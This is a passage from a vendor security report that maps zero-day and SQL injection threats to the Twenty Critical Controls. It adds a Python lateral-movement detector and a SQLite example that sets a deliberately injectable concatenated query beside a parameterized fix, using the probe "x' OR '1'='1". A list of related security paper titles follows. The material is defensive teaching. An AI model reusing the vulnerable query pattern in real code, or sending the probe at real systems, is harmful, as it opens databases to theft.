The implication of increasing duplicate discoveries is fairly alarming, in that the main mitigation for vulnerabilities of this type is patching, which is an invalid strategy for protecting against zero-day exploits. There is a heightened risk from cyber criminals, who can discover zero-day vulnerabilities and exploit them for profit. Add to this that software vendors have not necessarily lowered their average time for patching vulnerabilities reported to them, and that TippingPoint is aware of a number of vulnerabilities that were reported to vendors two years ago and are still awaiting a patch. This makes zero-day exploits in client-side applications one of the most significant threats to your network, and requires that you put in place additional information security measures and controls to complement your vulnerability assessment and remediation activities.

Best Practices in Mitigation and Control of the Top Risks

A few weeks ago, the Center for Strategic and International Studies published an updated version of the Twenty Critical Controls for Effective Cyber Defense (CAG.pdf). These controls reflect the consensus of many of the nation's top cyber defenders and attackers on which specific controls must be implemented first to mitigate known cyber threats. One of the most valuable uses of this report is to help organizations deploying the Twenty Critical Security Controls be certain that no critical new attacks have been found that would force substantial changes in the Twenty Controls. At the same time, it helps people who are implementing the Twenty Critical Security Controls focus their attention on the elements of the controls that need to be completed most immediately.

The Key Elements of these attacks and associated Controls:

User applications have vulnerabilities that can be exploited remotely. Controls 2 (Inventory of Software), 3 (Secure Configurations), and 10 (Vulnerability Assessment and Remediation) can ensure that vulnerable software is accounted for, identified for defensive planning, and remediated in a timely manner. Control 5 (Boundary Defenses) can provide some prevention/detection capability when attacks are launched.

There is an increasing number of zero-days in these types of applications. Control 12 (Malware Defenses) is the most effective at mitigating many of these attacks because it can ensure that malware entering the network is effectively contained. Controls 2, 3, and 10 have minimal impact on zero-day exploits, and Control 5 can provide some prevention/detection capabilities against zero-days as well as known exploits.

Successful exploitation grants the attacker the same privileges on the network as the user and/or host that is compromised. Control 5 (Boundary Defenses) can ensure that compromised host systems (portable and static) can be contained.
Controls 8 (Controlled Use of Administrative Privileges) and 9 (Controlled Access) limit what access the attacker has inside the enterprise once they have successfully exploited a user application.

The attacker is masquerading as a legitimate user but is often performing actions that are not typical for that user. Controls 6 (Audit Logs) and 11 (Account Monitoring and Control) can help identify potentially malicious or suspicious behavior, and Control 18 (Incident Response Capability) can assist in both detection and recovery from a compromise.

Critical Controls - As Applied to HTTP Server Threats

As discussed previously, web application vulnerabilities and server-side HTTP threats pose a serious threat not only to the web servers you control, but also to the servers that your users visit in day-to-day activities. Trends indicate that SQL injection attacks are rising rapidly. SQL injection attacks are only possible if an application is written in such a way as to allow them; the vulnerability is not a matter of configuration or (usually) access control.

The Key Elements of these attacks and associated Controls:

Web applications have vulnerabilities that can be easily discovered and exploited remotely. The relevant controls include the following: Control 7 (Application Software Security) is perhaps the most critical control regarding these types of attacks. Application developers should ensure that all input received from remote sources is sanitized of data meaningful to backend database systems. Control 5 (Boundary Defenses) can ensure that the appropriate layered protections are in place to prevent/detect attacks aimed at your web servers. Controls 2 (Inventory of Software), 3 (Secure Configurations), and 10 (Vulnerability Assessment and Remediation) can ensure that vulnerable applications are accounted for, identified for defensive planning, and remediated in a timely manner.

Successful exploitation grants the attacker the ability to put malicious code on the server and attempt to compromise all clients that browse that server.
Control 6 (Audit Logs) can assist in identifying when someone has compromised your web server. Control 18 (Incident Response Capability) can help mitigate the impact of, and assist in recovery from, attacks against vulnerable applications.

Copyright 3Com Corporation. TippingPoint and Digital Vaccine are registered trademarks of 3Com Corporation or its subsidiaries. All other company and product names may be trademarks of their respective holders. While every effort is made to ensure the information given is accurate, 3Com does not accept liability for any errors which may arise. Specifications and other information in this document may be subject to change without notice.
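As an added illustration of Controls 6 and 11 (this is example code written for this edition, not part of the report or of the Twenty Critical Controls): the attacker in the tutorial reuses a legitimate user's credentials, so the audit trail shows that account logging on to machines it has never used, in quick succession, ending at a domain controller. The Python below builds a per-account baseline of destination hosts from an earlier period of normalized logon records and flags any account that authenticates to several unfamiliar hosts within a short burst. All host names, account names, timestamps and thresholds are constructed for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample logon records (not from any real environment):
# (timestamp, account, source host, destination host), as a log collector
# might normalize them from domain controller and member server audit logs.
BASELINE_LOGONS = [
    ("2009-08-03T09:02:11", "jsmith", "WKS-017", "FILESRV-01"),
    ("2009-08-03T09:05:40", "jsmith", "WKS-017", "MAIL-01"),
    ("2009-08-04T08:58:03", "jsmith", "WKS-017", "FILESRV-01"),
    ("2009-08-03T07:30:00", "svc-backup", "BACKUP-01", "FILESRV-01"),
    ("2009-08-03T07:31:00", "svc-backup", "BACKUP-01", "FILESRV-02"),
    ("2009-08-03T07:32:00", "svc-backup", "BACKUP-01", "DC-01"),
    ("2009-08-03T10:00:00", "admin-kc", "ADM-JUMP", "DC-01"),
]

# The review window: jsmith's normal morning logon, then a burst of logons
# to machines that account has never touched, ending at a domain controller.
CURRENT_LOGONS = [
    ("2009-09-14T09:01:10", "jsmith", "WKS-017", "FILESRV-01"),
    ("2009-09-14T14:22:05", "jsmith", "WKS-017", "WKS-042"),
    ("2009-09-14T14:22:48", "jsmith", "WKS-017", "WKS-043"),
    ("2009-09-14T14:23:30", "jsmith", "WKS-017", "ADM-JUMP"),
    ("2009-09-14T14:31:12", "jsmith", "ADM-JUMP", "DC-01"),
    ("2009-09-14T07:30:00", "svc-backup", "BACKUP-01", "FILESRV-01"),
    ("2009-09-14T07:31:00", "svc-backup", "BACKUP-01", "FILESRV-02"),
    ("2009-09-14T07:32:00", "svc-backup", "BACKUP-01", "DC-01"),
]


def build_baseline(records):
    """Map each account to the set of destination hosts it is normally seen logging on to."""
    hosts = defaultdict(set)
    for _, account, _, dest in records:
        hosts[account].add(dest)
    return hosts


def find_lateral_movement(records, baseline, new_host_threshold=2, burst_minutes=15):
    """Flag accounts that log on to `new_host_threshold` or more hosts outside
    their baseline within `burst_minutes`. A legitimate user rarely touches
    several unfamiliar machines in a few minutes; someone reusing that user's
    credentials to move through the network does exactly that.
    Returns {account: sorted list of the unfamiliar hosts in the burst}."""
    unfamiliar = defaultdict(list)
    for when, account, _, dest in records:
        if dest not in baseline.get(account, set()):
            unfamiliar[account].append((datetime.fromisoformat(when), dest))

    alerts = {}
    for account, events in unfamiliar.items():
        events.sort()
        # Slide a window over the account's unfamiliar logons, earliest first.
        for i, (start, _) in enumerate(events):
            window_end = start + timedelta(minutes=burst_minutes)
            hosts_in_window = {dest for when, dest in events[i:] if when <= window_end}
            if len(hosts_in_window) >= new_host_threshold:
                alerts[account] = sorted(hosts_in_window)
                break
    return alerts


if __name__ == "__main__":
    baseline = build_baseline(BASELINE_LOGONS)
    for account, hosts in find_lateral_movement(CURRENT_LOGONS, baseline).items():
        print(f"ALERT {account}: logons to unfamiliar hosts {', '.join(hosts)}")
```

The service account is not flagged because its nightly pass over the same servers is in its baseline; jsmith is, because four of the afternoon logons land on hosts the baseline never saw. A production version of this check would also baseline the source host of each logon and treat any first-time access to a domain controller by a non-administrative account (Control 8) as an alert on its own.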
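An added example for Control 7 (written for this edition, not code from the report): the advice that input must be "sanitized of data meaningful to backend database systems" is met most reliably by never letting request data become part of the SQL text at all. The Python below shows the weak pattern, a query assembled by string concatenation, next to the corrected one using a bound parameter, against a constructed users table in an in-memory SQLite database. Table layout, rows and the probe value are all constructed for the example.

```python
import sqlite3

# Constructed users table (sample data, not from any real system).
SAMPLE_USERS = [("alice", "staff"), ("bob", "staff"), ("carol", "admin")]


def make_db():
    """In-memory SQLite database standing in for the web application's backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, role TEXT)")
    conn.executemany("INSERT INTO users (username, role) VALUES (?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def lookup_user_vulnerable(conn, username):
    """The weak pattern: request data is spliced into the SQL text, so a quote
    or keyword inside `username` is parsed as part of the query itself."""
    query = "SELECT username, role FROM users WHERE username = '" + username + "'"
    return conn.execute(query).fetchall()


def lookup_user_safe(conn, username):
    """The corrected pattern: the value travels to the engine as a bound
    parameter and is never interpreted as SQL, whatever characters it holds."""
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ?", (username,)
    ).fetchall()


if __name__ == "__main__":
    conn = make_db()
    probe = "x' OR '1'='1"  # a value any remote client could submit in a form field
    print("vulnerable:", lookup_user_vulnerable(conn, probe))  # every row comes back
    print("safe:      ", lookup_user_safe(conn, probe))        # no such user: []
```

With the concatenated query the probe value turns the WHERE clause into a tautology and the whole table is returned; with the parameterized query the same string is simply a username that does not exist. The parameterized form also handles legitimate values containing quotes (such as O'Brien) without error, which is why it belongs in the application code rather than in a boundary device (Control 5) that can only guess at the application's intent.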


More information

This session was presented by Jim Stickley of TraceSecurity on Wednesday, October 23 rd at the Cyber Security Summit.

This session was presented by Jim Stickley of TraceSecurity on Wednesday, October 23 rd at the Cyber Security Summit. The hidden risks of mobile applications This session was presented by Jim Stickley of TraceSecurity on Wednesday, October 23 rd at the Cyber Security Summit. To learn more about TraceSecurity visit www.tracesecurity.com

More information

Streamlining Web and Email Security

Streamlining Web and Email Security How to Protect Your Business from Malware, Phishing, and Cybercrime The SMB Security Series Streamlining Web and Email Security sponsored by Introduction to Realtime Publishers by Don Jones, Series Editor

More information

Rational AppScan & Ounce Products

Rational AppScan & Ounce Products IBM Software Group Rational AppScan & Ounce Products Presenters Tony Sisson and Frank Sassano 2007 IBM Corporation IBM Software Group The Alarming Truth CheckFree warns 5 million customers after hack http://infosecurity.us/?p=5168

More information

Reducing the Cost and Complexity of Web Vulnerability Management

Reducing the Cost and Complexity of Web Vulnerability Management WHITE PAPER: REDUCING THE COST AND COMPLEXITY OF WEB..... VULNERABILITY.............. MANAGEMENT..................... Reducing the Cost and Complexity of Web Vulnerability Management Who should read this

More information

Defending Against Cyber Attacks with SessionLevel Network Security

Defending Against Cyber Attacks with SessionLevel Network Security Defending Against Cyber Attacks with SessionLevel Network Security May 2010 PAGE 1 PAGE 1 Executive Summary Threat actors are determinedly focused on the theft / exfiltration of protected or sensitive

More information

CHAPTER 3 : INCIDENT RESPONSE FIVE KEY RECOMMENDATIONS GLOBAL THREAT INTELLIGENCE REPORT 2015 :: COPYRIGHT 2015 NTT INNOVATION INSTITUTE 1 LLC

CHAPTER 3 : INCIDENT RESPONSE FIVE KEY RECOMMENDATIONS GLOBAL THREAT INTELLIGENCE REPORT 2015 :: COPYRIGHT 2015 NTT INNOVATION INSTITUTE 1 LLC : INCIDENT RESPONSE FIVE KEY RECOMMENDATIONS 1 FIVE KEY RECOMMENDATIONS During 2014, NTT Group supported response efforts for a variety of incidents. Review of these engagements revealed some observations

More information

Adobe Systems Incorporated

Adobe Systems Incorporated Adobe Connect 9.2 Page 1 of 8 Adobe Systems Incorporated Adobe Connect 9.2 Hosted Solution June 20 th 2014 Adobe Connect 9.2 Page 2 of 8 Table of Contents Engagement Overview... 3 About Connect 9.2...

More information

Why should I care about PDF application security?

Why should I care about PDF application security? Why should I care about PDF application security? What you need to know to minimize your risk Table of contents 1: Program crashes present an opportunity for attack 2: Look for software that fully uses

More information

[state of the internet] / SEO Attacks. Threat Advisory: Continuous Uptick in SEO Attacks

[state of the internet] / SEO Attacks. Threat Advisory: Continuous Uptick in SEO Attacks TLP: GREEN Issue Date: 1.12.16 Threat Advisory: Continuous Uptick in SEO Attacks Risk Factor High The Akamai Threat Research Team has identified a highly sophisticated Search Engine Optimization (SEO)

More information

Top Five Data Security Trends Impacting Franchise Operators. Payment System Risk September 29, 2009

Top Five Data Security Trends Impacting Franchise Operators. Payment System Risk September 29, 2009 Top Five Data Security Trends Impacting Franchise Operators Payment System Risk September 29, 2009 Top Five Data Security Trends Agenda Data Security Environment Compromise Overview and Attack Methods

More information

Penetration Testing with Kali Linux

Penetration Testing with Kali Linux Penetration Testing with Kali Linux PWK Copyright 2014 Offensive Security Ltd. All rights reserved. Page 1 of 11 All rights reserved to Offensive Security, 2014 No part of this publication, in whole or

More information

The Top Web Application Attacks: Are you vulnerable?

The Top Web Application Attacks: Are you vulnerable? QM07 The Top Web Application Attacks: Are you vulnerable? John Burroughs, CISSP Sr Security Architect, Watchfire Solutions jburroughs@uk.ibm.com Agenda Current State of Web Application Security Understanding

More information

Last update: February 23, 2004

Last update: February 23, 2004 Last update: February 23, 2004 Web Security Glossary The Web Security Glossary is an alphabetical index of terms and terminology relating to web application security. The purpose of the Glossary is to

More information

How to achieve PCI DSS Compliance with Checkmarx Source Code Analysis

How to achieve PCI DSS Compliance with Checkmarx Source Code Analysis How to achieve PCI DSS Compliance with Checkmarx Source Code Analysis Document Scope This document aims to assist organizations comply with PCI DSS 3 when it comes to Application Security best practices.

More information

Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security

Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security Presented 2009-05-29 by David Strauss Thinking Securely Security is a process, not

More information

EC-Council CAST CENTER FOR ADVANCED SECURITY TRAINING. CAST 619 Advanced SQLi Attacks and Countermeasures. Make The Difference CAST.

EC-Council CAST CENTER FOR ADVANCED SECURITY TRAINING. CAST 619 Advanced SQLi Attacks and Countermeasures. Make The Difference CAST. CENTER FOR ADVANCED SECURITY TRAINING 619 Advanced SQLi Attacks and Countermeasures Make The Difference About Center of Advanced Security Training () The rapidly evolving information security landscape

More information

The Essentials Series. PCI Compliance. sponsored by. by Rebecca Herold

The Essentials Series. PCI Compliance. sponsored by. by Rebecca Herold The Essentials Series PCI Compliance sponsored by by Rebecca Herold Using PCI DSS Compliant Log Management to Identify Attacks from Outside the Enterprise...1 Outside Attacks Impact Business...1 PCI DSS

More information

Cyber Essentials Scheme

Cyber Essentials Scheme Cyber Essentials Scheme Requirements for basic technical protection from cyber attacks June 2014 December 2013 Contents Contents... 2 Introduction... 3 Who should use this document?... 3 What can these

More information

ITEC441- IS Security. Chapter 15 Performing a Penetration Test

ITEC441- IS Security. Chapter 15 Performing a Penetration Test 1 ITEC441- IS Security Chapter 15 Performing a Penetration Test The PenTest A penetration test (pentest) simulates methods that intruders use to gain unauthorized access to an organization s network and

More information

Can Consumer AV Products Protect Against Critical Microsoft Vulnerabilities?

Can Consumer AV Products Protect Against Critical Microsoft Vulnerabilities? ANALYST BRIEF Can Consumer AV Products Protect Against Critical Microsoft Vulnerabilities? Author Randy Abrams Tested Products Avast Internet Security 7 AVG Internet Security 2012 Avira Internet Security

More information

An Integrated CyberSecurity Approach for HEP Grids. Workshop Report. http://hpcrd.lbl.gov/hepcybersecurity/

An Integrated CyberSecurity Approach for HEP Grids. Workshop Report. http://hpcrd.lbl.gov/hepcybersecurity/ An Integrated CyberSecurity Approach for HEP Grids Workshop Report http://hpcrd.lbl.gov/hepcybersecurity/ 1. Introduction The CMS and ATLAS experiments at the Large Hadron Collider (LHC) being built at

More information